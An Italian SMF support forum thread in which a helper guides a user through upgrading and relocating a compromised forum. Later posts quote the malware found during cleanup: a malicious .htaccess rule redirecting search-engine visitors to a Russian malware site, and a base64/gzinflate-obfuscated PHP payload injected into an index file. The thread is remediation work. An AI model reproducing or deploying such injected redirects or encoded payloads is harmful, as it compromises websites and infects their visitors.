Advertisement:

Author Topic: Migrazione sito..  (Read 9512 times)

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Migrazione sito..
« on: May 21, 2012, 08:38:36 AM »
Ciao ragazzi...
ecco il mio problema..
Per vari problemi tra virus e installazioni farlocche...il mio sito si trova in una condizione semplice...e' da rifare...

Al momento,ho una pagina Html come home page.
Una struttura joomla come scheletro..e all'interno il forum smf SMF 2.0 RC3

ahime',non sono in grado di mettere a posto da solo il tutto senza rifarlo...
esiste una guida passo - passo per esportare tutto (utenti,database ecc..)
e reimportarlo in una versione piu aggiornata del software?

il mio problema e' che vorrei eliminare joomla,che e' alla base del problema...ma dentro c'e' il forum  :-\


Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #1 on: May 21, 2012, 09:01:15 AM »
Ciao Gabriele77 e benvenuto da queste parti! :)

Allora, io non conosco joomla e quindi dobbiamo andare un po' con i piedi di piombo.

1) Joomla a cosa serve nel tuo sito?
2) Il forum è "infilato" con i iframe nella pagina?
3) link al sito così tocchiamo "con mano" cosa succede. :P


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #2 on: May 21, 2012, 09:09:01 AM »
eccomi...

il sito e' www.motobauscia.com

il riassunto del sito e' questo :

home page --> pagina html
scheletro [inutilizzabile ormai] ---> joomla
forum ---> smf (funzionante e con quasi 2.000.000 di pagine visitate...)


Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #3 on: May 21, 2012, 10:12:02 AM »
Ok, quindi in pratica joomla al momento non è utilizzato per niente mi pare.

Quindi il forum non dovrebbe essere in alcun modo integrato con joomla.
Se così è...beh puoi semplicemente fare un large upgrade all'ultima versione (2.0.2) e al massimo spostare la directory del forum fuori da quella di joomla (ricordandoti di cambiare tutti i link e magari mettere un redirect).
Ricordati che se stai usando FileZilla un setting stupido impostato di default dagli sviluppatori di quel software potrebbe corrompere tutti gli allegati e gli avatar!!! Per ovviare devi andare nelle opzioni, cercare "trasferimento > tipi di file" (credo...purtroppo sto usando la versione inglese e non so com'è tradotto in italiano) e togliere la spunta a "tratta i file senza estensione come file ASCII" (anche questa traduzione ad occhio...).

Per il large upgrade puoi provare a leggerti questa guida.
Se vuoi fare una prova in locale (cosa che io consiglierei, oppure puoi duplicare il forum on-line e testare lì l'upgrade) tieni presente questa breve guida all'utilizzo di XAMPP.

E se hai domande non esitare a chiedere! ;D


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #4 on: May 21, 2012, 05:40:06 PM »
innanzi tutto grazzissime...
gentilissimo...
era proprio questa la mia idea...
estrapolare il forum da joomla,aggiornarlo all'ultima versione,e poi cancellare joomla...ormai sostituito con una semplice pagina html..

domani dal lavoro provo...
domandone...

post,foto,e cose cosi sono proprio tante.. [3gb di foto circa...]
e ho anche la gallery veccchietta...ne conosci una free semplice per gli upload e carina nella visione? [stile facebook..]
calcola che ad ogni cartella della gallery ci sono circa 150 foto...

Quote
(ricordandoti di cambiare tutti i link e magari mettere un redirect).

ahime'...nn so come si fa...
nel caso posso migrare il forum fuori dalla cartella joomla e poi e testarlo un po'?
ps. tutto nasce per un maledetto trojan,insito...lo cancello..e dopo poco torna...exploit kit virus 'et simili... '

a domani coi test!
e grazie ancora  ;D


Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #5 on: May 21, 2012, 08:14:03 PM »
ps. tutto nasce per un maledetto trojan,insito...lo cancello..e dopo poco torna...exploit kit virus 'et simili... '
Premesso che effettivamente sarebbe ora di aggiornare (la RC3 è vecchia e con noti problemi di sicurezza!), se il tuo problema è un trojan...forse ti conviene contattare l'host e parlare anche con loro, dubito che un upgrade possa risolvere un simile problema.

domani il resto...azz se è tardi!!! :o


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #6 on: May 22, 2012, 04:11:31 AM »
li ho contattati tempo fa...e mi hanno rimbalzato sull'aggiornamento del sito..
in effetti nasce da joomla,che si e' virussato...
e poi ha trasportato a smf e alla home..

installando un nuovo forum,cancellando joomla,e rifacendo al home dovrei essere aposto no?

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #7 on: May 22, 2012, 04:28:12 AM »
bene...guida e si inizia...
che dio ce la mandi buona  ;D

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #8 on: May 22, 2012, 04:28:27 AM »
mah...

Cambiato tutte le password? (ftp, database, ecc. giusto per sicurezza)

Non ti resta che provare, tanto se joomla non lo usi è inutile tenerlo in giro.

post,foto,e cose cosi sono proprio tante.. [3gb di foto circa...]
In generale durante un upgrade non si perde niente.
Le foto sono messe come allegati?

e ho anche la gallery veccchietta...ne conosci una free semplice per gli upload e carina nella visione? [stile facebook..]
calcola che ad ogni cartella della gallery ci sono circa 150 foto...
Che gallery usi?

Quote
(ricordan
doti di cambiare tutti i link e magari mettere un redirect).

ahime'...nn so come si fa...
Beh, il redirect più facile è mettere nella directory un file php che contenga:
Code: [Select]
<?php
header
('http://www.tuosito.it/nuovoforum/');
altrimenti si può usare htaccess (però mai una volta che mi ricordo qual'è la sintassi...dovrei cercarla)

nel caso posso migrare il forum fuori dalla cartella joomla e poi e testarlo un po'?
Yep, io di solito consiglio:
1) fai una copia del tuo forum (file) in un'altra directory,
2) fai una copia delle tabelle del database in un altro database,
3) repair_settings.php (lo trovi su questo sito in download > tools) e correggi i percorsi
4) test di conversione su questo forum di prova
5) se tutto va bene eliminare la prova, mettere in manutenzione il forum e fare la conversione.
Occhio al punto 2, perché se non hai a disposizione un secondo database diventa sostanzialmente inutile fare i test.


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #9 on: May 22, 2012, 04:28:53 AM »
bene...guida e si inizia...
che dio ce la mandi buona  ;D
In bocca al lupo! ;D


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #10 on: May 22, 2012, 04:39:15 AM »
bene...guida e si inizia...
che dio ce la mandi buona  ;D
In bocca al lupo! ;D


ahaha...mi sono spaventato e aspetto 2 min prima di lanciare l'up..ehehe...
ho un bel dubbione [adesso leggo anche quello che mi hai scritto...]

il forum,una volta aggiornato,e' ancora sotto Joomla?

letto ora...

Quote
Yep, io di solito consiglio:
1) fai una copia del tuo forum (file) in un'altra directory,
2) fai una copia delle tabelle del database in un altro database,
3) repair_settings.php (lo trovi su questo sito in download > tools) e correggi i percorsi
4) test di conversione su questo forum di prova
5) se tutto va bene eliminare la prova, mettere in manutenzione il forum e fare la conversione.
Occhio al punto 2, perché se non hai a disposizione un secondo database diventa sostanzialmente inutile fare i test.

e' piu o meno aramaico  ;D

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #11 on: May 22, 2012, 05:00:29 AM »
lol (all'aramaico)

Quote
il forum,una volta aggiornato,e' ancora sotto Joomla?
Puoi aggiornarlo e poi spostare la directory fuori da quella di joomla (a poi usare repair_settings per correggere percorsi e url).


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #12 on: May 22, 2012, 05:53:43 AM »
Situazione...

forum spostato nella cartella test...
step da fare :
1)aggiornare alle 2.02 come da guida
2)cancellare joomla
3)metterlo sotto il sito e ripristinare link...

e' corretto??  ;D


Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #13 on: May 22, 2012, 06:05:07 AM »
Non era necessario spostarlo...io avevo scritto *copiarlo* per fare i test su una copia del forum e non rischiare sorprese...

Va beh, il warning qui l'hai letto?
Ricordati che se stai usando FileZilla un setting stupido impostato di default dagli sviluppatori di quel software potrebbe corrompere tutti gli allegati e gli avatar!!! Per ovviare devi andare nelle opzioni, cercare "trasferimento > tipi di file" (credo...purtroppo sto usando la versione inglese e non so com'è tradotto in italiano) e togliere la spunta a "tratta i file senza estensione come file ASCII" (anche questa traduzione ad occhio...).
Giusto per sicurezza. ;)

Ve be, non è necessario tenerlo in una directory "test", puoi metterlo direttamente nella radice (allo stesso livello di "joomla" per intenderci.


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #14 on: May 22, 2012, 06:12:36 AM »
settaggio di filezilla messo  8)

...ora sto copiando il forum sotto joomla
tengo quello sotto test e lo aggiorno...

e vedo un po' com'e'...
il db rimane invariato?
se no...come faccio una copia...?

mi scuso...ma e' la prima volta che metto le mani cosi nel profondo del sistema...e non so proprio come muovermi (anche se sono un sistemista :) )

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #15 on: May 22, 2012, 07:13:32 AM »
il db rimane invariato?
se no...come faccio una copia...?
Dal pannello di controllo dell'host dovresti avere un link a "phpMyAdmin", da lì puoi gestire i database...poi i dettagli dipendono da host a host...alcuni host (es aruba) ti danno un certo numero di database già preconfigurati, altri ti danno la possibilità di crearli dal pannello controllo dell'host.

mi scuso...ma e' la prima volta che metto le mani cosi nel profondo del sistema...e non so proprio come muovermi (anche se sono un sistemista :) )
Nessun problema, siamo qui per aiutare! ;D


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #16 on: May 22, 2012, 08:24:21 AM »
mmm...non e' un buon inizio...  :-[


Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #17 on: May 22, 2012, 08:34:22 AM »
lol

Hai fatto naturalmente un backup di tutto prima di iniziare, vero?

Come hai fatto a caricare il pacchetto?
Se hai caricato lo zip da un pannello di controllo e poi decompresso il file, potrebbe essere che i file originali non siano stati sovrascritti. In questo caso dovresti cancellare le directory Sources, Themes e i file index.php, SSI.php...e basta mi pare e poi decomprimere ancora lo zip.


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #18 on: May 22, 2012, 08:39:03 AM »
Adesso riprovo...
Ho dezippato la cartella sul desktop,decompresso i file e sovrascritto tutto...

per il bck ne ho una copia in locale,poi c'e' il bck giornaliero e settimanale del hosting..
provo a cancellare i file che mi hai detto  ;)

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #19 on: May 22, 2012, 08:54:06 AM »
Niente...non va... :(

ho provato piu volte...eliminando i file ecc...
ma nulla..

quasi quasi lo lascio cosi com'e'..ahaha!

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #20 on: May 22, 2012, 09:04:28 AM »
Se non erro hai spostato la directory del forum da /joomla/forum a /forum/.
Hai usato repair_settings.php per correggere i percorsi?


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #21 on: May 22, 2012, 09:19:09 AM »
allora...

al momento,sotto joomla,ho la cartella forum,attivo e funzionante e ora ci sono persone che ci stanno scrivendo dentro...
fuori,sotto la root,c'e' la cartella 'forum' che contiene i file di upgrade,che hanno sovrascritto una copia del forum vecchio..

www.motobauscia.com\forum\upgrade da quell'errore...
http://www.motobauscia.com/joomla/forum/ invece funziona...

l'idea era di testare tutto...e poi copiare la cartella per rendere tutto indolore...
mi viene in mente una cosa...ma se io installassi al posto dell'upgrade la full?
la installo,faccio le modifiche...e poi importo db e post...e' una follia o potrebbe funzionare?

al momento nn partendo nulla,non ho fatto nulla  ;D

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #22 on: May 22, 2012, 09:26:01 AM »
mi viene in mente una cosa...ma se io installassi al posto dell'upgrade la full?
la installo,faccio le modifiche...e poi importo db e post...e' una follia o potrebbe funzionare?
Sì.
Perché tra la RC3 e la finale ci possono (al momento onestamente non mi ricordo se ci sono effettivamente) dei cambi al db e quindi l'import potrebbe causare casini.

Puoi mettere la directory /forum accessibile così che posso vedere? (al momento mi restituisce un "forbidden you don't have accesss")


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #23 on: May 22, 2012, 09:51:53 AM »
se usi facebook...ti aggiiungo...cosi possiamo scriverci da li...
birra offerta chiaro  ;D

--> http://www.facebook.com/gabriele.bresciani.5

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #24 on: May 22, 2012, 09:56:30 AM »
* emanuele non ha facebook...


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #25 on: May 22, 2012, 10:01:15 AM »
* emanuele non ha facebook...

ok...
sto spostando file nella cartella forum nella root e ricomincio..


Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #26 on: May 22, 2012, 10:07:37 AM »
Quando hai i file su, usa repair_settings: http://download.simplemachines.org/?tools
e correggi i percorsi con i nuovi.

Poi fai l'upgrade!


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #27 on: May 22, 2012, 10:20:13 AM »
Quando hai i file su, usa repair_settings: http://download.simplemachines.org/?tools
e correggi i percorsi con i nuovi.

Poi fai l'upgrade!

la mia ignoranza domina...
ho scaricato il tool,come lo installo/uso?

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #28 on: May 22, 2012, 10:25:53 AM »
Lo carichi nella nuova directory edl forum, quindi col browser vai a:
http://www.motobauscia.com/forum/repair_settings.php
e controlli la sezione "percorsi".


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #29 on: May 22, 2012, 01:46:02 PM »
si lavora e si fatica...per il pane...e per..  8)

stasera ci si diverte  ;D ;D ;D

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #30 on: May 23, 2012, 03:35:59 AM »
Buongiorno!
grazie all'aiuto di emanuele ci siamo quasi...
giochicchio un po' coi template in attesa della conclusione...

sei un grande  ;D

ore 10.12...

Quote
giochicchio un po' coi template in attesa della conclusione...

uguale distruggere  :( :( :(
« Last Edit: May 23, 2012, 04:12:19 AM by Gabriele77 »

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #31 on: May 23, 2012, 04:23:38 AM »
* emanuele si sveglia relativamente tardi... :P

148330 file mancanti...


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #32 on: May 23, 2012, 04:34:20 AM »
ho messo un template...e ora nn va piu nulla

non riesco piu ad entrare come admin per cambiarlo...  :( :( :(
Un admin che deve cambiare il proprio tema perché quello in uso non funziona ha sempre un arma:
Code: [Select]
http://www.motobauscia.com/forum/index.php?theme=1;D


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #33 on: May 23, 2012, 04:38:41 AM »
ahaah! mo ci giochicchio!
grazie grazie  ;D


fammi sapere che posso fare di altro ..
togliamo joomla?  8)

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #34 on: May 24, 2012, 04:37:54 AM »
Buongiorno!
forse ho capito il problema!!

Se si apre il sito,si viene re-indirizzati qui ---> hxxp://rolyjyl.ru/count30.php
[Non apritelo...]

andando a controllare qui --> http://sucuri.net/global ,viene indicato come sito malevolo..
e associato all'htaccess...
nella mia ignoranza,me lo sono portato in locale e l'ho aperto con notepad...

e questo e' quello che leggo...
nn mi sembra corretto...sbaglio?

Quote
#d93065#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ hxxp://rolyjyl.ru/count30.php [R=301,L]
</IfModule>
#/d93065#

ora provo a rinominarlo old...e vedere che succede...
che ne pensate?

il sito e' aposto per il resto...e' stato brasato cacchio...
ema ema...grazie ancora  ;D

Edit by emanuele: meglio togliere qualche pezzo all'url se non deve essere aperta. ;)
« Last Edit: May 24, 2012, 08:25:32 AM by emanuele »

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #35 on: May 24, 2012, 04:57:30 AM »
brasato l'htacces...
ma serve a qualcosa quel file?  :-X

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #36 on: May 24, 2012, 05:36:16 AM »
non so piu che fare...
qui me lo a ok...  :( :( :(


Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #37 on: May 24, 2012, 08:24:25 AM »
Beh, ovviamente un htaccess del genere è da rimuovere immediatamente.
Ecco perché è bene spiegare *bene* il problema in tutti i dettagli possibili...

Allora, adesso c'è ancora qualche problema con i virus?


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #38 on: May 24, 2012, 08:59:26 AM »
Beh, ovviamente un htaccess del genere è da rimuovere immediatamente.
Ecco perché è bene spiegare *bene* il problema in tutti i dettagli possibili...

Allora, adesso c'è ancora qualche problema con i virus?

adesso siamo ad una media del 90% di gente che entra...
stavo cercando di modificare la scritta 'media' in 'gallery'....
giochicchiando un po' mi sono imbattuto nell'ftp e in 3 file index.php....
nn so se sia corretta come cosa...ho provato ad aprirli in locale...e ho trovato nel terzo una stringa strana finale..



index_.php

Quote
#d93065#
echo(gzinflate(base64_decode("3VZtb5swEP4rnYUEFCXFNoZmlPVDtF+wj1E+5IUM1DQkQBc1Uf/7zmebkLRJaTVp06JAzHF3z3Pnu4uvrv6Pz101K/N1/a0un/ebZF7Mnh7TVd2flemkTr8vU/nkkCfixpv+ZL1OV/Nhli/nzsYjIHuZTepZ5my27j5Lej5lNyLe7RJ7Ynv20o4Xib0oYVnA9QjXMAOZB6/LoR2/IOQ2TdZlURf18zo17qZlOi3dvXS0+2X3q6dpVZcOZbxHGXO93S6uqmQ0lq6czL23i3lqfyUk3iZ1lldxmmxHi8aKSoNxvEoI7QtLXsFA3m4tyi0aWUFkCSYFIdyEkDdUiuSKgcRiPmg3ImFxikr6+URZBLDkviWkiA+sQCCYfAjVw8EC0GmI0JpCpMxQSOUqkGIGUNxIBLrSkZxGJIJTCJBIFLlk4YmlkFaQBB2Hoq6I8TM4XXIlQoWLpEQr1MBi0QWqEjTQptIFa1IRDDCz8OUQBWDIt76hANmTCTRBqKj7ikqgVFBZkWYNc8WXWUypcoThOvlchaHYRhjGoMWIUbUvRhleYgw6uobzeQsVqmh4o/lBXYQ6f0Hj1Uhok1mhthXRNVH8quhwvyEgFXLjR5hfZtR0jYaaE9OJFK3tU740S7l7iAvhqBfGirelKuxbuekq/2d3HpRocKlI2wJEV9R1GR7Hg7vRoR3eLHBhejRAPzgjWGTapMugMMWPiWqn8OLUaCbB+e5oZgKmCHSwvltjiZmqOHSf3FNx0oWhqQbTZ8rz4K+12lsxvWoM/yMd0R4cbzSGKswOiO/3zgHp3RbqjHrcZa0B0t1Fqx/ftf9M+bwejUdFdDzr/lDNnhuxXZA/9T/2T/znSx5Cz3HeYIIR91v1jcTwMHN7YYySkeOk7j2pCByWXI+siUeWeU3GDplYpDkwuW68KEonT8Ie61F5xXlPhNGXxI9zz3P3D0kuD2BV5f2oy3z1s78oi8dhBoc6OIg5PXqdXTvco9er0cMYnL1sQDVOnQ0s7270cfM3")));
#/d93065#

altro malware?


Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #39 on: May 24, 2012, 09:16:38 AM »
adesso siamo ad una media del 90% di gente che entra...
stavo cercando di modificare la scritta 'media' in 'gallery'....
Se non ricordo male Modifications.italian-utf8.php

giochicchiando un po' mi sono imbattuto nell'ftp e in 3 file index.php....
nn so se sia corretta come cosa...ho provato ad aprirli in locale...e ho trovato nel terzo una stringa strana finale..
[...]
altro malware?
I primi due sono corretti, il terzo, sì è un altro malware.


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #40 on: May 24, 2012, 05:34:33 PM »
Sembra andare tutto  ;D
ora lo personalizzo e ci siamo...
ema...che dire..

grazie di tutto  :)

Offline emanuele

  • SMF Super Hero
  • *******
  • Posts: 14,156
  • Gender: Male
  • THERE'S JUST ME
Re: Migrazione sito..
« Reply #41 on: May 24, 2012, 06:07:23 PM »
Di niente! ;)

Giusto per pignoleria: "mark topic solved" qui sotto? :D O:)


Take a peek at what I'm doing! ;D



Hai bisogno di supporto in Italiano?

Aiutateci ad aiutarvi: spiegate bene il vostro problema: no, "non funziona" non è una spiegazione!!
1) Cosa fai,
2) cosa ti aspetti,
3) cosa ottieni.

Offline Gabriele77

  • Semi-Newbie
  • *
  • Posts: 33
Re: Migrazione sito..
« Reply #42 on: May 25, 2012, 01:47:40 PM »
Di niente! ;)

Giusto per pignoleria: "mark topic solved" qui sotto? :D O:)

fatto  ;D